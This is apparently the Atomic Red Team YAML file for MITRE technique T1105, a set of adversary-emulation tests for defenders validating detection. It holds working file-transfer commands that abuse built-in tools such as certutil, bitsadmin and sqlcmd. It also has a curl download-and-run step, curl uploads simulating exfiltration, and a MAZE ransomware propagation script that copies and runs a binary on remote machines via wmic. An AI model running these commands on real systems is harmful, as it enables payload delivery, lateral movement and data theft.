security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1105/T1105.yaml
T
Atomic Red Team doc generator e2115e52c0 Generated docs from job=generate-docs branch=master [ci skip]
2025-10-06 15:55:53 +00:00

1302 lines
51 KiB
YAML
Raw Permalink Blame History

attack_technique: T1105
display_name: Ingress Tool Transfer
atomic_tests:
- name: rsync remote file copy (push)
auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409
description: |
Utilize rsync to perform a remote file copy (push)
supported_platforms:
- linux
- macos
input_arguments:
remote_path:
description: Remote path to receive rsync
type: path
default: /tmp/victim-files
remote_host:
description: Remote host to copy toward
type: string
default: victim-host
local_path:
description: Path of folder to copy
type: path
default: /tmp/adversary-rsync/
username:
description: User account to authenticate on remote host
type: string
default: victim
dependency_executor_name: sh
dependencies:
- description: |
rsync must be installed on the machine
prereq_command: |
if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi
get_prereq_command: |
(pkg install -y rsync)||(sudo apt-get -y install rsync)
executor:
command: |
rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
name: sh
elevation_required: true
- name: rsync remote file copy (pull)
auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f
description: |
Utilize rsync to perform a remote file copy (pull)
supported_platforms:
- linux
- macos
input_arguments:
remote_path:
description: Path of folder to copy
type: path
default: /tmp/adversary-rsync/
remote_host:
description: Remote host to copy from
type: string
default: adversary-host
local_path:
description: Local path to receive rsync
type: path
default: /tmp/victim-files
username:
description: User account to authenticate on remote host
type: string
default: adversary
dependency_executor_name: sh
dependencies:
- description: |
rsync must be installed on the machine
prereq_command: |
if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi
get_prereq_command: |
(pkg install -y rsync)||(sudo apt-get -y install rsync)
executor:
command: |
rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
name: sh
- name: scp remote file copy (push)
auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344
description: |
Utilize scp to perform a remote file copy (push)
supported_platforms:
- linux
- macos
input_arguments:
remote_path:
description: Remote path to receive scp
type: path
default: /tmp/victim-files/
local_file:
description: Path of file to copy
type: path
default: /tmp/adversary-scp
remote_host:
description: Remote host to copy toward
type: string
default: victim-host
username:
description: User account to authenticate on remote host
type: string
default: victim
executor:
command: |
scp #{local_file} #{username}@#{remote_host}:#{remote_path}
name: sh
- name: scp remote file copy (pull)
auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33
description: |
Utilize scp to perform a remote file copy (pull)
supported_platforms:
- linux
- macos
input_arguments:
remote_host:
description: Remote host to copy from
type: string
default: adversary-host
local_path:
description: Local path to receive scp
type: path
default: /tmp/victim-files/
remote_file:
description: Path of file to copy
type: path
default: /tmp/adversary-scp
username:
description: User account to authenticate on remote host
type: string
default: adversary
executor:
command: |
scp #{username}@#{remote_host}:#{remote_file} #{local_path}
name: sh
- name: sftp remote file copy (push)
auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e
description: |
Utilize sftp to perform a remote file copy (push)
supported_platforms:
- linux
- macos
input_arguments:
remote_path:
description: Remote path to receive sftp
type: path
default: /tmp/victim-files/
local_file:
description: Path of file to copy
type: path
default: /tmp/adversary-sftp
remote_host:
description: Remote host to copy toward
type: string
default: victim-host
username:
description: User account to authenticate on remote host
type: string
default: victim
executor:
command: |
sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
name: bash
- name: sftp remote file copy (pull)
auto_generated_guid: 0139dba1-f391-405e-a4f5-f3989f2c88ef
description: |
Utilize sftp to perform a remote file copy (pull)
supported_platforms:
- linux
- macos
input_arguments:
remote_host:
description: Remote host to copy from
type: string
default: adversary-host
local_path:
description: Local path to receive sftp
type: path
default: /tmp/victim-files/
remote_file:
description: Path of file to copy
type: path
default: /tmp/adversary-sftp
username:
description: User account to authenticate on remote host
type: string
default: adversary
executor:
command: |
sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
name: sh
- name: certutil download (urlcache)
auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0
description: |
Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works!
supported_platforms:
- windows
input_arguments:
remote_file:
description: URL of file to copy
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path to place file
type: path
default: Atomic-license.txt
executor:
command: |
cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
cleanup_command: |
del #{local_path} >nul 2>&1
name: command_prompt
- name: certutil download (verifyctl)
auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b
description: |
Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!
supported_platforms:
- windows
input_arguments:
remote_file:
description: URL of file to copy
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path to place file
type: path
default: Atomic-license.txt
executor:
command: |
$datePath = "certutil-$(Get-Date -format yyyy_MM_dd)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
certutil -verifyctl -split -f #{remote_file}
Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }
cleanup_command: |
Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorAction Ignore
name: powershell
- name: Windows - BITSAdmin BITS Download
auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b
description: |
This test uses BITSAdmin.exe to schedule a BITS job for the download of a file.
This technique is used by Qbot malware to download payloads.
supported_platforms:
- windows
input_arguments:
bits_job_name:
description: Name of the created BITS job
type: string
default: qcxjb7
local_path:
description: Local path to place file
type: path
default: '%temp%\Atomic-license.txt'
remote_file:
description: URL of file to copy
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
executor:
command: |
C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}
name: command_prompt
- name: Windows - PowerShell Download
auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8
description: |
This test uses PowerShell to download a payload.
This technique is used by multiple adversaries and malware families.
supported_platforms:
- windows
input_arguments:
remote_file:
description: URL of file to copy
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
destination_path:
description: Destination path to file
type: path
default: $env:TEMP\Atomic-license.txt
executor:
command: |
(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}")
cleanup_command: |
Remove-Item #{destination_path} -Force -ErrorAction Ignore
name: powershell
- name: OSTAP Worming Activity
auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad
description: |
OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity.
supported_platforms:
- windows
input_arguments:
destination_path:
description: Path to create remote file at. Default is local admin share.
type: string
default: '\\localhost\C$'
executor:
command: |
pushd #{destination_path}
echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js
CScript.exe AtomicTestT1105.js //E:JScript
del AtomicTestT1105.js /Q >nul 2>&1
del AtomicTestFileT1105.js /Q >nul 2>&1
popd
name: command_prompt
elevation_required: true
- name: svchost writing a file to a UNC path
auto_generated_guid: fa5a2759-41d7-4e13-a19c-e8f28a53566f
description: |
svchost.exe writing a non-Microsoft Office file to a file with a UNC path.
Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file.
supported_platforms:
- windows
executor:
command: |
copy C:\Windows\System32\cmd.exe C:\svchost.exe
C:\svchost.exe /c echo T1105 > \\localhost\c$\T1105.txt
cleanup_command: |
del C:\T1105.txt >nul 2>&1
del C:\\svchost.exe >nul 2>&1
name: command_prompt
elevation_required: true
- name: Download a File with Windows Defender MpCmdRun.exe
auto_generated_guid: 815bef8b-bf91-4b67-be4c-abe4c2a94ccc
description: |
Uses Windows Defender MpCmdRun.exe to download a file from the internet (must have version 4.18 installed).
The input arguments "remote_file" and "local_path" can be used to specify the download URL and the name of the output file.
By default, the test downloads the Atomic Red Team license file to the temp directory.
More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/
supported_platforms:
- windows
input_arguments:
remote_file:
description: URL of file to download
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Location to save downloaded file
type: path
default: '%temp%\Atomic-license.txt'
dependencies:
- description: 'Must have a Windows Defender version with MpCmdRun.exe installed'
prereq_command: |
cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
MpCmdRun.exe /? >nul 2>&1
get_prereq_command: Echo "A version of Windows Defender with MpCmdRun.exe must be installed manually"
executor:
command: |
cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
MpCmdRun.exe -DownloadFile -url #{remote_file} -path #{local_path}
cleanup_command: |-
del #{local_path} >nul 2>&1
del %temp%\MpCmdRun.log >nul 2>&1
name: command_prompt
- name: whois file download
auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab
description: |
Download a remote file using the whois utility
supported_platforms:
- linux
- macos
input_arguments:
remote_host:
description: Remote hostname or IP address
type: string
default: localhost
remote_port:
description: Remote port to connect to
type: integer
default: 8443
output_file:
description: Path of file to save output to
type: path
default: /tmp/T1105.whois.out
query:
description: Query to send to remote server
type: string
default: "Hello from Atomic Red Team test T1105"
timeout:
description: Timeout period before ending process (seconds)
type: integer
default: 1
dependencies:
- description: |
The whois and timeout commands must be present
prereq_command: |
which whois && which timeout
get_prereq_command: |
echo "Please install timeout and the whois package"
executor:
name: sh
elevation_required: false
command: |
timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file}
cleanup_command: |
rm -f #{output_file}
- name: File Download via PowerShell
auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2
description: |
Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary.
supported_platforms:
- windows
input_arguments:
target_remote_file:
description: File to download
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt
output_file:
description: File to write to
type: string
default: LICENSE.txt
executor:
command: |
(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file}
name: powershell
- name: File download with finger.exe on Windows
auto_generated_guid: 5f507e45-8411-4f99-84e7-e38530c45d01
description: |
Simulate a file download using finger.exe. Connect to localhost by default, use custom input argument to test finger connecting to an external server.
Because this is being tested on the localhost, you should not be expecting a successful connection
https://www.exploit-db.com/exploits/48815
https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/
supported_platforms:
- windows
input_arguments:
remote_host:
description: Remote hostname or IP address
type: string
default: localhost
executor:
name: command_prompt
command: |
finger base64_filedata@#{remote_host}
- name: Download a file with IMEWDBLD.exe
auto_generated_guid: 1a02df58-09af-4064-a765-0babe1a0d1e2
description: |
Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file.
Downloaded files can be found in "%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>" or `%LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>.
Run "Get-ChildItem -Path C:\Users\<USERNAME>\AppData\Local\Microsoft\Windows\INetCache\ -Include <FILENAME>* -Recurse -Force -File -ErrorAction SilentlyContinue" without quotes and adding the correct username and file name to locate the file.
supported_platforms:
- windows
input_arguments:
remote_url:
description: Location of file to be downloaded.
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml
file_name:
description: Name of the file to be downloaded without extension.
type: string
default: T1105
executor:
command: |
$imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe"
& $imewdbled #{remote_url}
cleanup_command: |
$inetcache = $env:LOCALAPPDATA + "\Microsoft\Windows\INetCache\"
$file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue)
if("" -ne "$file_to_be_removed") { Remove-Item "$file_to_be_removed" -ErrorAction Ignore }
name: powershell
- name: Curl Download File
auto_generated_guid: 2b080b99-0deb-4d51-af0f-833d37c4ca6a
description: |
The following Atomic utilizes native curl.exe, or downloads it if not installed, to download a remote DLL and output to a number of directories to simulate malicious behavior.
Expected output will include whether the file downloaded successfully or not.
supported_platforms:
- windows
input_arguments:
file_download:
description: File to download
type: string
default: https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll
curl_path:
description: path to curl.exe
type: path
default: C:\Windows\System32\Curl.exe
dependency_executor_name: powershell
dependencies:
- description: |
Curl must be installed on system.
prereq_command: |
if (Test-Path #{curl_path}) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe" C:\Windows\System32\Curl.exe
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl"
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
executor:
command: |
#{curl_path} -k #{file_download} -o c:\users\public\music\allthethingsx64.dll
#{curl_path} -k #{file_download} --output c:\users\public\music\allthethingsx64.dll
#{curl_path} -k #{file_download} -o c:\programdata\allthethingsx64.dll
#{curl_path} -k #{file_download} -o %Temp%\allthethingsx64.dll
cleanup_command: |
del c:\users\public\music\allthethingsx64.dll >nul 2>&1
del c:\users\public\music\allthethingsx64.dll >nul 2>&1
del c:\programdata\allthethingsx64.dll >nul 2>&1
del %Temp%\allthethingsx64.dll >nul 2>&1
name: command_prompt
- name: Curl Upload File
auto_generated_guid: 635c9a38-6cbf-47dc-8615-3810bc1167cf
description: |
The following Atomic utilizes native curl.exe, or downloads it if not installed, to upload a txt file to simulate data exfiltration
Expected output will include whether the file uploaded successfully or not.
supported_platforms:
- windows
input_arguments:
curl_path:
description: path to curl.exe
type: path
default: C:\Windows\System32\Curl.exe
remote_destination:
description: Remote destination
type: string
default: www.example.com
file_path:
description: File to upload
type: string
default: c:\temp\atomictestfile.txt
dependency_executor_name: powershell
dependencies:
- description: |
Curl must be installed on system.
prereq_command: |
if (Test-Path #{curl_path}) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\curl.zip
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe" C:\Windows\System32\Curl.exe
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl"
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
- description: |
A file must be created to upload
prereq_command: |
if (Test-Path #{file_path}) {exit 0} else {exit 1}
get_prereq_command: |
echo "This is an Atomic Test File" > #{file_path}
executor:
command: |
#{curl_path} -T #{file_path} #{remote_destination}
#{curl_path} --upload-file #{file_path} #{remote_destination}
#{curl_path} -d #{file_path} #{remote_destination}
#{curl_path} --data #{file_path} #{remote_destination}
name: command_prompt
- name: Download a file with Microsoft Connection Manager Auto-Download
auto_generated_guid: d239772b-88e2-4a2e-8473-897503401bcc
description: |
Uses the cmdl32 to download arbitrary file from the internet. The cmdl32 package is allowed to install the profile used to launch the VPN connection. However, the config is modified to download the arbitary file.
The issue of cmdl32.exe detecting and deleting the payload by identifying it as not a VPN Servers profile is avoided by setting a temporary TMP folder and denying the delete permission to all files for the user.
Upon successful execution the test will open calculator and Notepad executable for 10 seconds.
reference:
https://twitter.com/ElliotKillick/status/1455897435063074824
https://github.com/LOLBAS-Project/LOLBAS/pull/151
https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/
https://strontic.github.io/xcyclopedia/library/cmdl32.exe-FA1D5B8802FFF4A85B6F52A52C871BBB.html
supported_platforms:
- windows
input_arguments:
Path_to_file:
description: Path to the Batch script
type: path
default: PathToAtomicsFolder\T1105\src\T1105.bat
dependency_executor_name: powershell
dependencies:
- description: |
#{Path_to_file} must exist on system.
prereq_command: |
if (Test-Path "#{Path_to_file}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path "#{Path_to_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.bat" -OutFile "#{Path_to_file}"
executor:
command: |
"#{Path_to_file}" 1>NUL
cleanup_command: |
del /f/s/q %temp%\T1105 >nul 2>&1
rmdir /s/q %temp%\T1105 >nul 2>&1
name: command_prompt
- name: MAZE Propagation Script
auto_generated_guid: 70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf
description: |
This test simulates MAZE ransomware's propogation script that searches through a list of computers, tests connectivity to them, and copies a binary file to the Windows\Temp directory of each one.
Upon successful execution, a specified binary file will attempt to be copied to each online machine, a list of the online machines, as well as a list of offline machines will be output to a specified location.
Reference: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
supported_platforms:
- windows
input_arguments:
binary_file:
description: Binary file to copy to remote machines
type: string
default: $env:comspec
exe_remote_folder:
description: Path to store executable on remote machine (no drive letter)
type: string
default: \Windows\Temp\T1105.exe
remote_drive_letter:
description: Remote drive letter
type: string
default: C
dependency_executor_name: powershell
dependencies:
- description: |
Binary file must exist at specified location (#{binary_file})
prereq_command: |
if (Test-Path #{binary_file}) {exit 0} else {exit 1}
get_prereq_command: |
write-host "The binary_file input parameter must be set to a binary that exists on this computer."
- description: |
Machine list must exist at specified location ("PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt")
prereq_command: |
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
new-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt" | Out-Null
echo "A machine list file has been generated at "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt". Please enter the machines to target there, one machine per line."
executor:
command: |
$machine_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt"
$offline_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt"
$completed_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt"
foreach ($machine in get-content -path "$machine_list")
{if (test-connection -Count 1 -computername $machine -quiet)
{cmd /c copy "#{binary_file}" "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}"
echo $machine >> "$completed_list"
wmic /node: "$machine" process call create "regsvr32.exe /i #{remote_drive_letter}:#{exe_remote_folder}"}
else
{echo $machine >> "$offline_list"}}
cleanup_command: |
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt")
{foreach ($machine in get-content -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt")
{wmic /node: "$machine" process where name='"regsvr32.exe"' call terminate | out-null
Remove-Item -path "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}" -force -erroraction silentlycontinue}}
Remove-Item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt" -erroraction silentlycontinue
Remove-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt" -erroraction silentlycontinue
name: powershell
- name: Printer Migration Command-Line Tool UNC share folder into a zip file
auto_generated_guid: 49845fc1-7961-4590-a0f0-3dbcf065ae7e
description: |
Create a ZIP file from a folder in a remote drive
supported_platforms:
- windows
input_arguments:
Path_unc:
description: Path to the UNC folder
type: path
default: \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\
Path_PrintBrm:
description: Path to PrintBrm.exe
type: path
default: C:\Windows\System32\spool\tools\PrintBrm.exe
executor:
command: |
del %TEMP%\PrintBrm.zip >nul 2>&1
#{Path_PrintBrm} -b -d #{Path_unc} -f %TEMP%\PrintBrm.zip -O FORCE
cleanup_command: |
del %TEMP%\PrintBrm.zip >nul 2>&1
name: command_prompt
- name: Lolbas replace.exe use to copy file
auto_generated_guid: 54782d65-12f0-47a5-b4c1-b70ee23de6df
description: |
Copy file.cab to destination
Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/
supported_platforms:
- windows
input_arguments:
replace_cab:
description: Path to the cab file
type: path
default: PathToAtomicsFolder\T1105\src\redcanary.cab
Path_replace:
description: Path to replace.exe
type: path
default: C:\Windows\System32\replace.exe
dependency_executor_name: powershell
dependencies:
- description: |
#{replace_cab} must exist on system.
prereq_command: |
if (Test-Path "#{replace_cab}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path "#{replace_cab}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/redcanary.cab" -OutFile "#{replace_cab}"
executor:
command: |
del %TEMP%\redcanary.cab >nul 2>&1
#{Path_replace} "#{replace_cab}" %TEMP% /A
cleanup_command: |
del %TEMP%\redcanary.cab >nul 2>&1
name: command_prompt
- name: Lolbas replace.exe use to copy UNC file
auto_generated_guid: ed0335ac-0354-400c-8148-f6151d20035a
description: |
Copy UNC file to destination
Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/
supported_platforms:
- windows
input_arguments:
replace_cab:
description: UNC Path to the cab file
type: path
default: \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\redcanary.cab
Path_replace:
description: Path to replace.exe
type: path
default: C:\Windows\System32\replace.exe
executor:
command: |
del %TEMP%\redcanary.cab >nul 2>&1
#{Path_replace} #{replace_cab} %TEMP% /A
cleanup_command: |
del %TEMP%\redcanary.cab >nul 2>&1
name: command_prompt
- name: certreq download
auto_generated_guid: 6fdaae87-c05b-42f8-842e-991a74e8376b
description: Use certreq to download a file from the web
supported_platforms:
- windows
input_arguments:
local_path:
description: Local path to place file
type: string
default: '%temp%\Atomic-license.txt'
remote_file:
description: URL of file to copy
type: url
default: https://example.com
executor:
command: 'certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}'
cleanup_command: 'del #{local_path} >nul 2>&1'
name: command_prompt
- name: Download a file using wscript
auto_generated_guid: 97116a3f-efac-4b26-8336-b9cb18c45188
description: Use wscript to run a local VisualBasic file to download a remote file
supported_platforms:
- windows
input_arguments:
vbscript_file:
description: Full path to the VisualBasic downloading the file
type: string
default: PathToAtomicsFolder\T1105\src\T1105-download-file.vbs
dependency_executor_name: powershell
dependencies:
- description: |
#{vbscript_file} must be exist on system.
prereq_command: |
if (Test-Path "#{vbscript_file}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path "#{vbscript_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105-download-file.vbs" -OutFile "#{vbscript_file}"
executor:
command: |
wscript.exe "#{vbscript_file}"
cleanup_command: del Atomic-License.txt >nul 2>&1
name: command_prompt
- name: Linux Download File and Run
auto_generated_guid: bdc373c5-e9cf-4563-8a7b-a9ba720a90f3
description: |
Utilize linux Curl to download a remote file, chmod +x it and run it.
supported_platforms:
- linux
input_arguments:
remote_url:
description: url of remote payload
type: string
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh
payload_name:
description: payload name
type: string
default: atomic.sh
executor:
command: |
curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name}
cleanup_command: |
rm #{payload_name}
name: sh
- name: Nimgrab - Transfer Files
auto_generated_guid: b1729c57-9384-4d1c-9b99-9b220afb384e
description: |
Use nimgrab.exe to download a file from the web.
supported_platforms:
- windows
input_arguments:
remote_file:
description: URL of file to copy
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
destination_path:
description: Destination path to file
type: path
default: $env:TEMP\Atomic-license.txt
executor:
command: |
cmd /c "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe" #{remote_file} #{destination_path}
cleanup_command: |
del #{destination_path} >nul 2>&1
name: command_prompt
dependency_executor_name: powershell
dependencies:
- description: |
NimGrab must be installed on system.
prereq_command: |
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\nim.zip"
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\nim.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\nim" -Force
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\nim\nim-1.6.6\bin\nimgrab.exe" "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe"
- name: iwr or Invoke Web-Request download
auto_generated_guid: c01cad7f-7a4c-49df-985e-b190dcf6a279
description: |
Use 'iwr' or "Invoke-WebRequest" -URI argument to download a file from the web. Note: without -URI also works in some versions.
supported_platforms:
- windows
input_arguments:
remote_file:
description: URL of file to copy
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path to place file
type: path
default: '%temp%\Atomic-license.txt'
executor:
command: |
powershell.exe iwr -URI #{remote_file} -Outfile #{local_path}
cleanup_command: |
del %temp%\Atomic-license.txt >nul 2>&1
name: command_prompt
elevation_required: true
- name: Arbitrary file download using the Notepad++ GUP.exe binary
auto_generated_guid: 66ee226e-64cb-4dae-80e3-5bf5763e4a51
description: |-
GUP is an open source signed binary used by Notepad++ for software updates, and can be used to download arbitrary files(.zip) from internet/github.
[Reference](https://x.com/nas_bench/status/1535322182863179776?s=20)
Upon execution, a sample zip file will be downloaded to C:\Temp\Sample folder
supported_platforms:
- windows
input_arguments:
target_file_url:
description: 'URL of the target ZIP file (Eg: https://example.com/test.zip)'
type: url
default: https://getsamplefiles.com/download/zip/sample-2.zip
working_dir:
description: The directory where GUP.exe & it's dependecies exists
type: path
default: PathToAtomicsFolder\T1105\bin\
gup_executable:
description: GUP is an open source signed binary used by Notepad++ for software updates
type: String
default: PathToAtomicsFolder\T1105\bin\GUP.exe
target_file_sha256:
description: SHA256 value of target ZIP file
type: string
default: CAC4D26F32CA629DFB10FE614ED00EB1066A0C0011386290D3426C3DE2E53AC6
dependency_executor_name: powershell
dependencies:
- description: Gup.exe binary must exist on disk at specified location (#{gup_executable})
prereq_command: if (Test-Path "#{gup_executable}") {exit 0} else {exit 1}
get_prereq_command: |-
New-Item -Type Directory (split-path "#{gup_executable}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/bin/GUP.exe" -OutFile "#{gup_executable}"
executor:
command: |-
mkdir "c:\Temp"
cd #{working_dir}
GUP.exe -unzipTo "" "C:\Temp" "Sample #{target_file_url} #{target_file_sha256}"
cleanup_command: rmdir /s /q "C:\Temp\Sample" >nul 2>nul
name: command_prompt
elevation_required: true
- name: File download via nscurl
auto_generated_guid: 5bcefe5f-3f30-4f1c-a61a-8d7db3f4450c
description: |
Use nscurl to download and write a file/payload from the internet.
-k = Disable certificate checking
-o = Output destination
supported_platforms:
- macos
input_arguments:
remote_file:
description: URL of remote file to download
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
destination_path:
description: Local path to place remote file
type: path
default: license.txt
executor:
command: nscurl -k "#{remote_file}" -o "#{destination_path}"
cleanup_command: rm "#{destination_path}"
name: sh
elevation_required: false
- name: File Download with Sqlcmd.exe
auto_generated_guid: 6934c16e-0b3a-4e7f-ab8c-c414acd32181
description: |-
One of the windows packages 'Sqlcmd.exe' can be abused to download malicious files from C2 servers
This Atomic will exhibit the similar behavior by downloading a sample zip file from src directory of this Technique folder via GitHub URL
supported_platforms:
- windows
input_arguments:
remote_url:
description: URL of the C2 Server from where file/s need to be downloaded
type: url
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.zip
local_file_path:
description: The local file path along with filename to where the file needs to be downloaded and placed.
type: path
default: C:\T1105.zip
dependency_executor_name: powershell
dependencies:
- description: Windows package 'Sqlcmd' need to be available in the machine to execute this atomic successfully
prereq_command: if (Get-Command sqlcmd 2>$null) {exit 0} else {exit 1}
get_prereq_command: winget install Microsoft.Sqlcmd --silent 2>$null | Out-Null
executor:
command: 'sqlcmd -i #{remote_url} -o #{local_file_path}'
cleanup_command: rm "#{local_file_path}" 2>$null | Out-Null
name: powershell
